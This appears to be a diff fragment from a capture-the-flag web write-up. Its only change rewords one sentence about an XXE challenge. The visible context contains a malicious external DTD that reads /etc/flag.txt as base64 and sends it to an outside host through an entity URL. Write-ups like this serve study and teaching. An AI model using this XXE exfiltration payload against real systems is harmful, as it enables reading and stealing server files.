Sanduuz/CTFWriteUps/challenge.fi/Web/Securelogin/writeup.md

 Luckily this does not affect external parameter entities, so we can just use an external DTD.

-Let's start by creating a malicious DTD file that we are going to use:
+Let's start by creating a malicious DTD file to be used:
 ```xml
 <!ENTITY % flag SYSTEM "php://filter/convert.base64-encode/resource=/etc/flag.txt">
 <!ENTITY % XXE "<!ENTITY exfil SYSTEM 'http://[IP REDACTED]/?flag=%flag;'>">